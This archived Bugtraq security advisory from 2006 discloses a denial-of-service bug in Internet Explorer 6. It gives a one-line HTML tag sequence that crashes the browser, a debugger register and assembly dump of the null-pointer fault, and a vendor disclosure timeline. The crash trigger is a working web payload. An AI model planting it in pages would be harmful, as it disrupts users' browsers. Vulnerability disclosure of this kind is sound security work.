[BuHa-Security] DoS Vulnerability in MS IE 6 SP2

From: bugtraq@xxxxxxxxxxxx
Date: 25 May 2006 22:53:03 -0000

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

---------------------------------------------------
| BuHa Security-Advisory #12 | May 25th, 2006 |
---------------------------------------------------
| Vendor | MS Internet Explorer 6.0 |
| URL | http://www.microsoft.com/windows/ie/ |
| Version | <= 6.0.2900.2180.xpsp_sp2 |
| Risk | Low (Denial of Service) |
---------------------------------------------------

o Description:
=============

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: <mshtml.dll>#7d6d2db4
===================

Following HTML code forces MS IE 6 to crash:

<applet><h4><title> </title><base>

Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1132901785453-7d6d2db4.html

These are the register values and the ASM dump at the time of the access
violation:

eax=00000000 ebx=00000000 ecx=00e78d38 edx=00e7a704 esi=0012a268
edi=00000000 eip=7d6d2db4 esp=0012a228 ebp=0012a25c

7d6d2d7d e868f9ffff call mshtml+0x2226ea (7d6d26ea)
7d6d2d82 50 push eax
7d6d2d83 e835f8ffff call mshtml+0x2225bd (7d6d25bd)
7d6d2d88 85c0 test eax,eax
7d6d2d8a 8945f8 mov [ebp-0x8],eax
7d6d2d8d 0f85c4020000 jne mshtml+0x223057 (7d6d3057)
7d6d2d93 8b461c mov eax,[esi+0x1c]
7d6d2d96 8b4e18 mov ecx,[esi+0x18]
7d6d2d99 8365f400 and dword ptr [ebp-0xc],0x0
7d6d2d9d 8365fc00 and dword ptr [ebp-0x4],0x0
7d6d2da1 8b7e14 mov edi,[esi+0x14]
7d6d2da4 8945f0 mov [ebp-0x10],eax
7d6d2da7 e88462e4ff call mshtml+0x69030 (7d519030)
7d6d2dac 3bc7 cmp eax,edi
7d6d2dae 0f8402020000 je mshtml+0x222fb6 (7d6d2fb6)
FAULT ->7d6d2db4 8b07 mov eax,[edi]
ds:0023:00000000=????????
7d6d2db6 8bc8 mov ecx,eax
7d6d2db8 83e10f and ecx,0xf
7d6d2dbb 49 dec ecx
7d6d2dbc 0f849c010000 je mshtml+0x222f5e (7d6d2f5e)
7d6d2dc2 49 dec ecx
7d6d2dc3 0f84b3000000 je mshtml+0x222e7c (7d6d2e7c)
7d6d2dc9 49 dec ecx
7d6d2dca 49 dec ecx
7d6d2dcb 746c jz mshtml+0x222e39 (7d6d2e39)
7d6d2dcd 83e904 sub ecx,0x4
7d6d2dd0 0f85a5010000 jne mshtml+0x222f7b (7d6d2f7b)
7d6d2dd6 8bcf mov ecx,edi
7d6d2dd8 e8482ffeff call mshtml+0x205d25 (7d6b5d25)
7d6d2ddd 85c0 test eax,eax
7d6d2ddf 7430 jz mshtml+0x222e11 (7d6d2e11)
7d6d2de1 837e0400 cmp dword ptr [esi+0x4],0x0

This issue is a non-exploitable Null Pointer Dereference vulnerability and
leads to DoS.

o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:

MS IE 6 SP2 - Win XP Pro SP2
MS IE 6 - Win 2k SP4

o Disclosure Timeline:
=====================

xx Feb 06 - Vulnerabilities discovered.
08 Mar 06 - Vendor contacted.
22 Mar 06 - Vendor confirmed vulnerabilities.
25 May 06 - Public release.

o Solution:
==========

I think - this is not an official statement from the Microsoft Security
Response Center - the vulnerability will be fixed in an upcoming service
pack.

o Credits:
=========

Thomas Waldegger <bugtraq@xxxxxxxxxxxx>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online: http://morph3us.org/advisories/20060525-msie6-sp2-1.txt

- --
Don't you feel the power of CSS Layouts?
BuHa-Security Community: http://buha.info/board/

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFEdjPVkCo6/ctnOpYRAyHUAKCEVV7FWNe+R+n1LcnXBdJqLvPbPwCdEhsf
xDEUBcvk88NUT5rLt8Vl0VU=
=4DXQ
-----END PGP SIGNATURE-----

Follow-Ups:
- Re: [BuHa-Security] DoS Vulnerability in MS IE 6 SP2
  - From: ad@xxxxxxxxxxxxxxxx

Prev by Date: V-Webmail 1.6.4 Remote File Include
Next by Date: [BuHa-Security] MS06-013: HTML Tag Memory Corruption Vulnerability in MS IE 6 SP2
Previous by thread: V-Webmail 1.6.4 Remote File Include
Next by thread: Re: [BuHa-Security] DoS Vulnerability in MS IE 6 SP2
Index(es):
- Date
- Thread

Relevant Pages

SecurityFocus Microsoft Newsletter #176
... MICROSOFT VULNERABILITY SUMMARY ... Microsoft Windows XP HCP URI Handler Arbitrary Command Execu... ... PHPNuke Category Parameter SQL Injection Vulnerability ... Microsoft Baseline Security Analyzer Vulnerability Identific... ...
(Focus-Microsoft)
SecurityFocus Microsoft Newsletter #83
... MICROSOFT VULNERABILITY SUMMARY ... Microsoft IIS CodeBrws.ASP Source Code Disclosure Vulnerability ... Microsoft Internet Explorer History List Script Injection ... Microsoft Windows 2000 Lanman Denial of Service Vulnerability ...
(Focus-Microsoft)
SecurityFocus Microsoft Newsletter #81
... MICROSOFT VULNERABILITY SUMMARY ... WWWIsis Remote Command Execution Vulnerability ... Windows NT 4.0 Print Spooler Security ...
(Focus-Microsoft)
SecurityFocus Microsoft Newsletter #185
... NEW MICROSOFT VULNERABILITIES - Audit Your Network Security ... SurgeLDAP User.CGI Directory Traversal Vulnerability ... Microsoft Windows H.323 Remote Buffer Overflow Vulnerability ... Microsoft Jet Database Engine Remote Code Execution Vulnerab... ...
(Focus-Microsoft)
SecurityFocus Microsoft Newsletter #336
... MICROSOFT VULNERABILITY SUMMARY ... Microsoft Windows Unspecified Remote Code Execution Vulnerability ... Microsoft Windows Explorer BMP Image Denial of Service Vulnerability ... An attacker could leverage this issue to have arbitrary code execute with kernel level privileges. ...
(Focus-Microsoft)